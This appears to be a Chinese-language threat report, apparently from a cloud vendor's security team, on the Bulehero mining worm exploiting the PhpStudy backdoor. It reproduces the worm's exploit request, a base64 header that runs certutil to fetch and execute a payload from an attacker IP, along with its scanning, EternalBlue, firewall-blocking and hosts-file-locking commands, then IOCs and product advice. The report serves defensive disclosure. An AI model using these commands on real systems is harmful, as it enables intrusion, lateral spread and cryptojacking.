威脅快報|Bulehero挖礦蠕蟲升級,PhpStudy後門漏洞加入武器庫
概述
近日,阿里雲安全團隊監控到Bulehero挖礦蠕蟲進行了版本升級,蠕蟲升級後開始利用最新出現的PHPStudy後門漏洞作為新的攻擊方式對Windows主機進行攻擊,攻擊成功後會下載門羅幣挖礦程式進行牟利。 該挖礦程式會大肆搶佔伺服器CPU資源進行門羅幣的挖掘,造成伺服器卡頓,嚴重影響正常業務執行,甚至造成業務終端。關於該蠕蟲最早曝光於2018年7月,蠕蟲自出現後頻繁更新,陸續加入多達數十種的的攻擊方式,可以預計該駭客團伙將會不斷的尋找新的攻擊方式來植入其惡意程式。建議使用者及時排查自身主機是否存在安全漏洞,並關注阿里雲安全團隊的相關文章。
背景介紹
Bulehero
Bulehero挖礦蠕蟲最早出現於2018年初,初次曝光於2018年8月,因最早使用 http:// bulehero.in 域名被命名為Bulehero。 該蠕蟲專注於攻擊Windows伺服器,透過植入惡意挖礦軟體進行牟利。它使用多種複雜的攻擊方式進行傳播,自出現後更新頻繁,不斷的將新的攻擊方式加入自己的武器庫。
PhpStudy後門漏洞
PhpStudy是國內的一款免費的PHP除錯環境的程式整合包,在國內有著近百萬的PHP語言學習者和開發者使用者。在2019年9月20日,網上爆出PhpStudy存在“後門”:駭客早在2016年就編寫了“後門”檔案,並非法侵入了PhpStudy的官網,篡改了軟體安裝包植入“後門”。該“後門”具有遠端控制計算機的功能,可以遠端控制下載執行指令碼實現使用者個人資訊收集。據報導駭客利用該漏洞共非法控制計算機67萬餘臺,非法獲取大量賬號密碼類、聊天資料類、裝置碼類等資料10萬餘組。該“後門”除了會造成挖礦和資訊洩露,還有可能被勒索病毒利用,伺服器關鍵資料被勒索病毒加密後將無法找回,給被害者造成大量的資料、經濟損失。
蠕蟲分析
攻擊行為分析
攻擊者會向被攻擊的伺服器傳送一個利用漏洞的HTTP GET請求,惡意程式碼存在於請求頭的Accept-Charset欄位,欄位內容經過base64編碼。解碼後可以發現這是一段windows命令:利用certutil.exe工具下載download.exe
GET /index.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn
Referer:
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx
解碼後內容:
system('certutil.exe -urlcache -split -f %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');
被感染主機行為
如上圖是惡意檔案在主機中的行為流程圖,download.exe是Bulehero的下載器,會下載名為ScarupnpLogon.exe
的檔案。該檔案會釋放多個打包的惡意檔案,這些惡意檔案可分為三個模組:挖礦模組、掃描模組、攻擊模組。
- 挖礦模組:該模組進行門羅幣的挖礦,Bulehero在該版本中並未使用公共礦池進行挖礦,改用自建的礦池代理進行挖礦任務分發,因此可以避免暴露錢包地址,防止安全研究人員的跟蹤。
- 掃描模組:該模組會掃描網際網路的特定開放埠,並將掃描結果寫入到名為Result.txt的檔案中
C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445
- 攻擊模組:
該模組整合多種漏洞利用工具,讀取掃描結果並攻擊其他主機,如下程式是其使用永恆之藍漏洞模組進行攻擊。
C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
我們對比Bulehero升級前的樣本行為,發現它在主機中的行為並未有較大改變,依然是透過download.exe下載器下載檔案包,並釋放三個功能模組。但是它為了隱藏自身改變了惡意檔案命名方式,升級前透過混淆的系統檔名進行偽裝,升級後全部為隨機的檔案路徑和檔名。雖然隨機檔名相對於混淆系統檔名更容易暴露自己,但這種策略的好處是可以避免被其他挖礦病毒透過程式指紋清除,在資源競爭中佔據優勢。
- 其他行為
使用netsh ipsec安全工具,阻斷存在漏洞的服務埠,防止其他競爭者進入。
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filteraction name=BastardsList action=block
修改主機host防止其他競爭者劫持域名。
cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
時間線
我們根據Bulehero的惡意檔案編譯時間和檔案上傳時間,可以確定Bulehero的升級時間是在10月6號的23點,距離PhpStudy後門漏洞利用方式曝光只有2周。如果企業存在漏洞,去除中間的國慶長假,真正留給企業的修復之間只有幾天。從惡意檔案下載次數來看,截止到發稿前已經有1萬5千次的下載,可見該蠕蟲傳播速度極快,造成的破壞性很大。
其他攻擊方式
除了此次更新增加的PhpStudy後門漏洞,Bulehero還使用多種攻擊方式,如下是其他已知的攻擊方式。
IOCs
60[.]164[.]250[.]170
185[.]147[.]34[.]136
fky[.]dfg45dfg45[.]best
uu[.]dfg45dfg45[.]best
uu1[.]dfg45dfg45[.]best
ox[.]mygoodluck[.]best
oo[.]mygoodluck[.]best
安全建議
- 企業需要對涉及的漏洞及時修復,否則容易成為挖礦木馬的受害者。
- 建議使用阿里雲安全的下一代雲防火牆產品,其阻斷惡意外聯、能夠配置智慧策略的功能,能夠有效幫助防禦入侵。哪怕攻擊者在主機上的隱藏手段再高明,下載、挖礦、反彈shell這些操作,都需要進行惡意外聯;雲防火牆的攔截將徹底阻斷攻擊鏈。此外,使用者還可以透過自定義策略,直接遮蔽惡意網站,達到阻斷入侵的目的。此外,雲防火牆獨有的虛擬補丁功能,能夠幫助客戶更靈活、更“無感”地阻斷攻擊。
- 對於有更高定製化要求的使用者,可以考慮使用阿里雲安全管家服務。購買服務後將有經驗豐富的安全專家提供諮詢服務,定製適合您的方案,幫助加固系統,預防入侵。入侵事件發生後,也可介入直接協助入侵後的清理、事件溯源等,適合有較高安全需求的使用者,或未僱傭安全工程師,但希望保障系統安全的企業。
本文為雲棲社群原創內容,未經允許不得轉載。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/69949601/viewspace-2663251/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 威脅預警:蠕蟲級漏洞,危害堪比WannaCry
- 注意!挖礦蠕蟲病毒BuleHero 4.0版來襲 感染電腦超3萬臺
- 威脅快報|Nexus Repository Manager 3新漏洞已被用於挖礦木馬傳播,建議使用者儘快修復
- “驅動人生”殭屍網路全網撿漏,SMBv3“蠕蟲級”漏洞秒入武器庫
- 雲地協同,高效治理“挖礦”威脅
- Linux Redis自動化挖礦感染蠕蟲分析及建議LinuxRedis
- 挖礦殭屍網路蠕蟲病毒kdevtmpfsi處理過程dev
- Watchdogs利用Redis實施大規模挖礦,常見資料庫蠕蟲如何破?Redis資料庫
- 挖礦蠕蟲肆虐,詳解雲防火牆如何輕鬆“制敵”防火牆
- PhpStudy 後門分析PHP
- phpStudy2018 升級資料庫 MySQL5.7PHP資料庫MySql
- [轉載][威脅情報]繼LNMP後oneinstack也被新增了後門!LNMP
- 再見黑產“礦老闆”!360EDR多維防控挖礦木馬威脅
- 供應鏈威脅和漏洞
- 工信部:非法“挖礦”嚴重威脅網際網路網路安全
- 全球再迎超級颶風,黑客可利用微軟“蠕蟲級”高危漏洞暴擊全球黑客微軟
- 網站伺服器木馬後門查詢之威脅情報分析網站伺服器
- 門羅挖礦JSJS
- 綠盟威脅情報專欄|6月威脅熱點
- 綠盟威脅情報專欄|7月威脅熱點
- 微軟:加密貨幣挖礦類惡意軟體 已成為一項增長的威脅微軟加密
- Sophos:2021年威脅報告
- 威脅快報|首爆新型TLS 1.2協議漏洞,數千網站面臨資料洩露風險TLS協議網站
- Websense網際網路威脅報告:Web威脅更具混合性Web
- 駭客威脅英偉達解除挖礦鎖,否則洩露原始碼等機密資料原始碼
- Synaptics 蠕蟲病毒分析APT
- phpStudy 後門如何檢測和修復PHP
- phpstudy後門POC分析和EXP開發PHP
- 11 個 Ruby 庫被植入挖礦後門程式碼,刪除前已被下載 3584 次
- CrowdStrike:2024年全球威脅報告
- 企業如何打造“秒級響應”的威脅情報系統?
- NTT:2020年全球威脅情報報告
- PHP Everywhere 三個 RCE 漏洞威脅大量 WordPress 網站PHP網站
- 比特幣CPU挖礦、GPU挖礦、礦池及礦機挖礦技術原理比特幣GPU
- 活動 | 歡迎加入網路安全威脅資訊共享計劃
- 威脅情報建設漫談 一
- Thales:2021年資料威脅報告
- McAfee:2021年威脅預測報告